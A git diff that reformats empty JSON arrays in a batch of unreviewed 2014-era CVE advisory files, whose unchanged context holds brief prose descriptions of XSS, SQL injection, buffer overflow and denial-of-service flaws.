diff --git a/advisories/unreviewed/2022/05/GHSA-23gv-xgv3-fvq9/GHSA-23gv-xgv3-fvq9.json b/advisories/unreviewed/2022/05/GHSA-23gv-xgv3-fvq9/GHSA-23gv-xgv3-fvq9.json
index b2a24d711d4..6f06188a73a 100644
--- a/advisories/unreviewed/2022/05/GHSA-23gv-xgv3-fvq9/GHSA-23gv-xgv3-fvq9.json
+++ b/advisories/unreviewed/2022/05/GHSA-23gv-xgv3-fvq9/GHSA-23gv-xgv3-fvq9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-24cp-rv65-qm42/GHSA-24cp-rv65-qm42.json b/advisories/unreviewed/2022/05/GHSA-24cp-rv65-qm42/GHSA-24cp-rv65-qm42.json
index cd3f3ecf8fc..d22049e1d7a 100644
--- a/advisories/unreviewed/2022/05/GHSA-24cp-rv65-qm42/GHSA-24cp-rv65-qm42.json
+++ b/advisories/unreviewed/2022/05/GHSA-24cp-rv65-qm42/GHSA-24cp-rv65-qm42.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-256v-c957-m9f7/GHSA-256v-c957-m9f7.json b/advisories/unreviewed/2022/05/GHSA-256v-c957-m9f7/GHSA-256v-c957-m9f7.json
index 829732c72a6..f5b5b032cc5 100644
--- a/advisories/unreviewed/2022/05/GHSA-256v-c957-m9f7/GHSA-256v-c957-m9f7.json
+++ b/advisories/unreviewed/2022/05/GHSA-256v-c957-m9f7/GHSA-256v-c957-m9f7.json
@@ -7,12 +7,8 @@
"CVE-2014-4849"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in msg.php in FoeCMS allow remote attackers to inject arbitrary web script or HTML via the (1) e or (2) r parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-266x-3x8x-xj7x/GHSA-266x-3x8x-xj7x.json b/advisories/unreviewed/2022/05/GHSA-266x-3x8x-xj7x/GHSA-266x-3x8x-xj7x.json
index bdf3ebfb00a..dd3692b9ebb 100644
--- a/advisories/unreviewed/2022/05/GHSA-266x-3x8x-xj7x/GHSA-266x-3x8x-xj7x.json
+++ b/advisories/unreviewed/2022/05/GHSA-266x-3x8x-xj7x/GHSA-266x-3x8x-xj7x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2c7q-mc2r-gx7m/GHSA-2c7q-mc2r-gx7m.json b/advisories/unreviewed/2022/05/GHSA-2c7q-mc2r-gx7m/GHSA-2c7q-mc2r-gx7m.json
index ebc49518e7c..0ffb6540acd 100644
--- a/advisories/unreviewed/2022/05/GHSA-2c7q-mc2r-gx7m/GHSA-2c7q-mc2r-gx7m.json
+++ b/advisories/unreviewed/2022/05/GHSA-2c7q-mc2r-gx7m/GHSA-2c7q-mc2r-gx7m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2fhr-9w58-p9x4/GHSA-2fhr-9w58-p9x4.json b/advisories/unreviewed/2022/05/GHSA-2fhr-9w58-p9x4/GHSA-2fhr-9w58-p9x4.json
index 4bb1df7bd1f..efe7e5052c4 100644
--- a/advisories/unreviewed/2022/05/GHSA-2fhr-9w58-p9x4/GHSA-2fhr-9w58-p9x4.json
+++ b/advisories/unreviewed/2022/05/GHSA-2fhr-9w58-p9x4/GHSA-2fhr-9w58-p9x4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2pfc-324v-8rw3/GHSA-2pfc-324v-8rw3.json b/advisories/unreviewed/2022/05/GHSA-2pfc-324v-8rw3/GHSA-2pfc-324v-8rw3.json
index e01ebcb211f..9912ec1c80d 100644
--- a/advisories/unreviewed/2022/05/GHSA-2pfc-324v-8rw3/GHSA-2pfc-324v-8rw3.json
+++ b/advisories/unreviewed/2022/05/GHSA-2pfc-324v-8rw3/GHSA-2pfc-324v-8rw3.json
@@ -7,12 +7,8 @@
"CVE-2014-3891"
],
"details": "Buffer overflow in RimArts Becky! Internet Mail before 2.68 allows remote POP3 servers to execute arbitrary code via a crafted response.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2qgg-rg5j-rxrv/GHSA-2qgg-rg5j-rxrv.json b/advisories/unreviewed/2022/05/GHSA-2qgg-rg5j-rxrv/GHSA-2qgg-rg5j-rxrv.json
index df91d70df05..588c22a858e 100644
--- a/advisories/unreviewed/2022/05/GHSA-2qgg-rg5j-rxrv/GHSA-2qgg-rg5j-rxrv.json
+++ b/advisories/unreviewed/2022/05/GHSA-2qgg-rg5j-rxrv/GHSA-2qgg-rg5j-rxrv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2r6m-j7xh-c9fv/GHSA-2r6m-j7xh-c9fv.json b/advisories/unreviewed/2022/05/GHSA-2r6m-j7xh-c9fv/GHSA-2r6m-j7xh-c9fv.json
index 8a95a3da491..589f6d738f0 100644
--- a/advisories/unreviewed/2022/05/GHSA-2r6m-j7xh-c9fv/GHSA-2r6m-j7xh-c9fv.json
+++ b/advisories/unreviewed/2022/05/GHSA-2r6m-j7xh-c9fv/GHSA-2r6m-j7xh-c9fv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
index 051e5f4da7e..253d99509e0 100644
--- a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
+++ b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2wgg-mrqh-cxvr/GHSA-2wgg-mrqh-cxvr.json b/advisories/unreviewed/2022/05/GHSA-2wgg-mrqh-cxvr/GHSA-2wgg-mrqh-cxvr.json
index 0acfaad15e5..f231e26f806 100644
--- a/advisories/unreviewed/2022/05/GHSA-2wgg-mrqh-cxvr/GHSA-2wgg-mrqh-cxvr.json
+++ b/advisories/unreviewed/2022/05/GHSA-2wgg-mrqh-cxvr/GHSA-2wgg-mrqh-cxvr.json
@@ -7,12 +7,8 @@
"CVE-2014-5203"
],
"details": "wp-includes/class-wp-customize-widgets.php in the widget implementation in WordPress 3.9.x before 3.9.2 might allow remote attackers to execute arbitrary code via crafted serialized data.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-2wp5-2f53-g5f3/GHSA-2wp5-2f53-g5f3.json b/advisories/unreviewed/2022/05/GHSA-2wp5-2f53-g5f3/GHSA-2wp5-2f53-g5f3.json
index bd8a0d29f9c..dc84177270d 100644
--- a/advisories/unreviewed/2022/05/GHSA-2wp5-2f53-g5f3/GHSA-2wp5-2f53-g5f3.json
+++ b/advisories/unreviewed/2022/05/GHSA-2wp5-2f53-g5f3/GHSA-2wp5-2f53-g5f3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2xfx-56hw-759c/GHSA-2xfx-56hw-759c.json b/advisories/unreviewed/2022/05/GHSA-2xfx-56hw-759c/GHSA-2xfx-56hw-759c.json
index 6876b4cc379..63063f1e06c 100644
--- a/advisories/unreviewed/2022/05/GHSA-2xfx-56hw-759c/GHSA-2xfx-56hw-759c.json
+++ b/advisories/unreviewed/2022/05/GHSA-2xfx-56hw-759c/GHSA-2xfx-56hw-759c.json
@@ -7,12 +7,8 @@
"CVE-2014-4529"
],
"details": "Cross-site scripting (XSS) vulnerability in fpg_preview.php in the Flash Photo Gallery plugin 0.7 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the path parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-2xv4-x724-2399/GHSA-2xv4-x724-2399.json b/advisories/unreviewed/2022/05/GHSA-2xv4-x724-2399/GHSA-2xv4-x724-2399.json
index d382eae1635..defac23cfcd 100644
--- a/advisories/unreviewed/2022/05/GHSA-2xv4-x724-2399/GHSA-2xv4-x724-2399.json
+++ b/advisories/unreviewed/2022/05/GHSA-2xv4-x724-2399/GHSA-2xv4-x724-2399.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-32x4-2mw2-5hjv/GHSA-32x4-2mw2-5hjv.json b/advisories/unreviewed/2022/05/GHSA-32x4-2mw2-5hjv/GHSA-32x4-2mw2-5hjv.json
index 979e14340fe..4ca5aed63f4 100644
--- a/advisories/unreviewed/2022/05/GHSA-32x4-2mw2-5hjv/GHSA-32x4-2mw2-5hjv.json
+++ b/advisories/unreviewed/2022/05/GHSA-32x4-2mw2-5hjv/GHSA-32x4-2mw2-5hjv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-35p9-57h8-299w/GHSA-35p9-57h8-299w.json b/advisories/unreviewed/2022/05/GHSA-35p9-57h8-299w/GHSA-35p9-57h8-299w.json
index d43d670570c..03ff14dbd1d 100644
--- a/advisories/unreviewed/2022/05/GHSA-35p9-57h8-299w/GHSA-35p9-57h8-299w.json
+++ b/advisories/unreviewed/2022/05/GHSA-35p9-57h8-299w/GHSA-35p9-57h8-299w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-36pg-q9f9-m4xv/GHSA-36pg-q9f9-m4xv.json b/advisories/unreviewed/2022/05/GHSA-36pg-q9f9-m4xv/GHSA-36pg-q9f9-m4xv.json
index 5a5c9e7f5bd..8c9f6e6439b 100644
--- a/advisories/unreviewed/2022/05/GHSA-36pg-q9f9-m4xv/GHSA-36pg-q9f9-m4xv.json
+++ b/advisories/unreviewed/2022/05/GHSA-36pg-q9f9-m4xv/GHSA-36pg-q9f9-m4xv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-36qf-647g-r75g/GHSA-36qf-647g-r75g.json b/advisories/unreviewed/2022/05/GHSA-36qf-647g-r75g/GHSA-36qf-647g-r75g.json
index 843280ecf0d..316c62ec919 100644
--- a/advisories/unreviewed/2022/05/GHSA-36qf-647g-r75g/GHSA-36qf-647g-r75g.json
+++ b/advisories/unreviewed/2022/05/GHSA-36qf-647g-r75g/GHSA-36qf-647g-r75g.json
@@ -7,12 +7,8 @@
"CVE-2014-4524"
],
"details": "Cross-site scripting (XSS) vulnerability in classes/custom-image/media.php in the WP Easy Post Types plugin before 1.4.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ref parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-37hv-4cjv-mxqq/GHSA-37hv-4cjv-mxqq.json b/advisories/unreviewed/2022/05/GHSA-37hv-4cjv-mxqq/GHSA-37hv-4cjv-mxqq.json
index c087d691605..36f5bf43248 100644
--- a/advisories/unreviewed/2022/05/GHSA-37hv-4cjv-mxqq/GHSA-37hv-4cjv-mxqq.json
+++ b/advisories/unreviewed/2022/05/GHSA-37hv-4cjv-mxqq/GHSA-37hv-4cjv-mxqq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-389x-3xpr-86vp/GHSA-389x-3xpr-86vp.json b/advisories/unreviewed/2022/05/GHSA-389x-3xpr-86vp/GHSA-389x-3xpr-86vp.json
index 8551084ce01..575b6d8d4c3 100644
--- a/advisories/unreviewed/2022/05/GHSA-389x-3xpr-86vp/GHSA-389x-3xpr-86vp.json
+++ b/advisories/unreviewed/2022/05/GHSA-389x-3xpr-86vp/GHSA-389x-3xpr-86vp.json
@@ -7,12 +7,8 @@
"CVE-2014-5101"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in WeBid 1.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) TPL_name, (2) TPL_nick, (3) TPL_email, (4) TPL_year, (5) TPL_address, (6) TPL_city, (7) TPL_prov, (8) TPL_zip, (9) TPL_phone, (10) TPL_pp_email, (11) TPL_authnet_id, (12) TPL_authnet_pass, (13) TPL_worldpay_id, (14) TPL_toocheckout_id, or (15) TPL_moneybookers_email in a first action to register.php or the (16) username parameter in a login action to user_login.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3fcp-gh22-82v3/GHSA-3fcp-gh22-82v3.json b/advisories/unreviewed/2022/05/GHSA-3fcp-gh22-82v3/GHSA-3fcp-gh22-82v3.json
index a64cb726869..c068ccf3c51 100644
--- a/advisories/unreviewed/2022/05/GHSA-3fcp-gh22-82v3/GHSA-3fcp-gh22-82v3.json
+++ b/advisories/unreviewed/2022/05/GHSA-3fcp-gh22-82v3/GHSA-3fcp-gh22-82v3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3fq7-xp3x-g73j/GHSA-3fq7-xp3x-g73j.json b/advisories/unreviewed/2022/05/GHSA-3fq7-xp3x-g73j/GHSA-3fq7-xp3x-g73j.json
index d94d9d005a4..d283d3c1e7c 100644
--- a/advisories/unreviewed/2022/05/GHSA-3fq7-xp3x-g73j/GHSA-3fq7-xp3x-g73j.json
+++ b/advisories/unreviewed/2022/05/GHSA-3fq7-xp3x-g73j/GHSA-3fq7-xp3x-g73j.json
@@ -7,12 +7,8 @@
"CVE-2014-4593"
],
"details": "Cross-site scripting (XSS) vulnerability in wp-plugins-net/index.php in the WP Plugin Manager (wppm) plugin 1.6.4.b and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filter parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3g5m-332q-27r3/GHSA-3g5m-332q-27r3.json b/advisories/unreviewed/2022/05/GHSA-3g5m-332q-27r3/GHSA-3g5m-332q-27r3.json
index 92d5c48778e..a8dbdd84521 100644
--- a/advisories/unreviewed/2022/05/GHSA-3g5m-332q-27r3/GHSA-3g5m-332q-27r3.json
+++ b/advisories/unreviewed/2022/05/GHSA-3g5m-332q-27r3/GHSA-3g5m-332q-27r3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3rhc-pc7v-fhr7/GHSA-3rhc-pc7v-fhr7.json b/advisories/unreviewed/2022/05/GHSA-3rhc-pc7v-fhr7/GHSA-3rhc-pc7v-fhr7.json
index 7524ec1f20a..45aecba7cec 100644
--- a/advisories/unreviewed/2022/05/GHSA-3rhc-pc7v-fhr7/GHSA-3rhc-pc7v-fhr7.json
+++ b/advisories/unreviewed/2022/05/GHSA-3rhc-pc7v-fhr7/GHSA-3rhc-pc7v-fhr7.json
@@ -7,12 +7,8 @@
"CVE-2014-3817"
],
"details": "Juniper Junos 11.4 before 11.4R12, 12.1X44 before 12.1X44-D32, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, and 12.1X47 before 12.1X47-D10 on SRX Series devices, when NAT protocol translation from IPv4 to IPv6 is enabled, allows remote attackers to cause a denial of service (flowd hang or crash) via a crafted packet.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3vvf-jcfx-25cj/GHSA-3vvf-jcfx-25cj.json b/advisories/unreviewed/2022/05/GHSA-3vvf-jcfx-25cj/GHSA-3vvf-jcfx-25cj.json
index 2377fffd280..346b20b17ff 100644
--- a/advisories/unreviewed/2022/05/GHSA-3vvf-jcfx-25cj/GHSA-3vvf-jcfx-25cj.json
+++ b/advisories/unreviewed/2022/05/GHSA-3vvf-jcfx-25cj/GHSA-3vvf-jcfx-25cj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-3xj5-fgv9-m5qp/GHSA-3xj5-fgv9-m5qp.json b/advisories/unreviewed/2022/05/GHSA-3xj5-fgv9-m5qp/GHSA-3xj5-fgv9-m5qp.json
index 47d9bf0a45e..5c5da340e8a 100644
--- a/advisories/unreviewed/2022/05/GHSA-3xj5-fgv9-m5qp/GHSA-3xj5-fgv9-m5qp.json
+++ b/advisories/unreviewed/2022/05/GHSA-3xj5-fgv9-m5qp/GHSA-3xj5-fgv9-m5qp.json
@@ -7,12 +7,8 @@
"CVE-2014-4939"
],
"details": "SQL injection vulnerability in the ENL Newsletter (enl-newsletter) plugin 1.0.1 for WordPress allows remote authenticated administrators to execute arbitrary SQL commands via the id parameter in the enl-add-new page to wp-admin/admin.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-432m-34f7-gx5j/GHSA-432m-34f7-gx5j.json b/advisories/unreviewed/2022/05/GHSA-432m-34f7-gx5j/GHSA-432m-34f7-gx5j.json
index d19313aa88d..29b6b051567 100644
--- a/advisories/unreviewed/2022/05/GHSA-432m-34f7-gx5j/GHSA-432m-34f7-gx5j.json
+++ b/advisories/unreviewed/2022/05/GHSA-432m-34f7-gx5j/GHSA-432m-34f7-gx5j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-466j-7cc4-9xrq/GHSA-466j-7cc4-9xrq.json b/advisories/unreviewed/2022/05/GHSA-466j-7cc4-9xrq/GHSA-466j-7cc4-9xrq.json
index 2caedf27500..b7d1fbe33a0 100644
--- a/advisories/unreviewed/2022/05/GHSA-466j-7cc4-9xrq/GHSA-466j-7cc4-9xrq.json
+++ b/advisories/unreviewed/2022/05/GHSA-466j-7cc4-9xrq/GHSA-466j-7cc4-9xrq.json
@@ -7,12 +7,8 @@
"CVE-2014-4522"
],
"details": "Cross-site scripting (XSS) vulnerability in client-assist.php in the dsSearchAgent: WordPress Edition plugin 1.0-beta10 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4gjw-87gw-7984/GHSA-4gjw-87gw-7984.json b/advisories/unreviewed/2022/05/GHSA-4gjw-87gw-7984/GHSA-4gjw-87gw-7984.json
index 6be98f7b989..cc3e4600465 100644
--- a/advisories/unreviewed/2022/05/GHSA-4gjw-87gw-7984/GHSA-4gjw-87gw-7984.json
+++ b/advisories/unreviewed/2022/05/GHSA-4gjw-87gw-7984/GHSA-4gjw-87gw-7984.json
@@ -7,12 +7,8 @@
"CVE-2014-4856"
],
"details": "Cross-site scripting (XSS) vulnerability in the Polldaddy Polls & Ratings plugin before 2.0.25 for WordPress allows remote attackers to inject arbitrary web script or HTML via vectors related to a ratings shortcode and a unique ID. NOTE: some of these details are obtained from third party information.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4j38-964f-658r/GHSA-4j38-964f-658r.json b/advisories/unreviewed/2022/05/GHSA-4j38-964f-658r/GHSA-4j38-964f-658r.json
index ed4ceb2e521..54bacda07ab 100644
--- a/advisories/unreviewed/2022/05/GHSA-4j38-964f-658r/GHSA-4j38-964f-658r.json
+++ b/advisories/unreviewed/2022/05/GHSA-4j38-964f-658r/GHSA-4j38-964f-658r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4m9p-wh47-w846/GHSA-4m9p-wh47-w846.json b/advisories/unreviewed/2022/05/GHSA-4m9p-wh47-w846/GHSA-4m9p-wh47-w846.json
index a0643c5a6ee..15e62df05d4 100644
--- a/advisories/unreviewed/2022/05/GHSA-4m9p-wh47-w846/GHSA-4m9p-wh47-w846.json
+++ b/advisories/unreviewed/2022/05/GHSA-4m9p-wh47-w846/GHSA-4m9p-wh47-w846.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4mvg-4gmx-p2pm/GHSA-4mvg-4gmx-p2pm.json b/advisories/unreviewed/2022/05/GHSA-4mvg-4gmx-p2pm/GHSA-4mvg-4gmx-p2pm.json
index 8a30db48233..41c3f9068f3 100644
--- a/advisories/unreviewed/2022/05/GHSA-4mvg-4gmx-p2pm/GHSA-4mvg-4gmx-p2pm.json
+++ b/advisories/unreviewed/2022/05/GHSA-4mvg-4gmx-p2pm/GHSA-4mvg-4gmx-p2pm.json
@@ -7,12 +7,8 @@
"CVE-2014-4563"
],
"details": "Cross-site scripting (XSS) vulnerability in go.php in the URL Cloak & Encrypt (url-cloak-encrypt) plugin 2.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4p2f-cf4h-825m/GHSA-4p2f-cf4h-825m.json b/advisories/unreviewed/2022/05/GHSA-4p2f-cf4h-825m/GHSA-4p2f-cf4h-825m.json
index 33577958bf5..35469ff9838 100644
--- a/advisories/unreviewed/2022/05/GHSA-4p2f-cf4h-825m/GHSA-4p2f-cf4h-825m.json
+++ b/advisories/unreviewed/2022/05/GHSA-4p2f-cf4h-825m/GHSA-4p2f-cf4h-825m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4pwx-p578-rqxj/GHSA-4pwx-p578-rqxj.json b/advisories/unreviewed/2022/05/GHSA-4pwx-p578-rqxj/GHSA-4pwx-p578-rqxj.json
index a622a376354..d12933870c9 100644
--- a/advisories/unreviewed/2022/05/GHSA-4pwx-p578-rqxj/GHSA-4pwx-p578-rqxj.json
+++ b/advisories/unreviewed/2022/05/GHSA-4pwx-p578-rqxj/GHSA-4pwx-p578-rqxj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4v8j-8w8m-gj44/GHSA-4v8j-8w8m-gj44.json b/advisories/unreviewed/2022/05/GHSA-4v8j-8w8m-gj44/GHSA-4v8j-8w8m-gj44.json
index 743ca56c07a..a18b193fdaa 100644
--- a/advisories/unreviewed/2022/05/GHSA-4v8j-8w8m-gj44/GHSA-4v8j-8w8m-gj44.json
+++ b/advisories/unreviewed/2022/05/GHSA-4v8j-8w8m-gj44/GHSA-4v8j-8w8m-gj44.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4vfm-26vq-xv3w/GHSA-4vfm-26vq-xv3w.json b/advisories/unreviewed/2022/05/GHSA-4vfm-26vq-xv3w/GHSA-4vfm-26vq-xv3w.json
index b8d67954c2a..8c5f164458b 100644
--- a/advisories/unreviewed/2022/05/GHSA-4vfm-26vq-xv3w/GHSA-4vfm-26vq-xv3w.json
+++ b/advisories/unreviewed/2022/05/GHSA-4vfm-26vq-xv3w/GHSA-4vfm-26vq-xv3w.json
@@ -7,12 +7,8 @@
"CVE-2014-4541"
],
"details": "Cross-site scripting (XSS) vulnerability in shortcode-generator/preview-shortcode-external.php in the OMFG Mobile Pro plugin 1.1.26 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-4vv4-jwqc-29hw/GHSA-4vv4-jwqc-29hw.json b/advisories/unreviewed/2022/05/GHSA-4vv4-jwqc-29hw/GHSA-4vv4-jwqc-29hw.json
index 20f8e927691..642b79a800f 100644
--- a/advisories/unreviewed/2022/05/GHSA-4vv4-jwqc-29hw/GHSA-4vv4-jwqc-29hw.json
+++ b/advisories/unreviewed/2022/05/GHSA-4vv4-jwqc-29hw/GHSA-4vv4-jwqc-29hw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
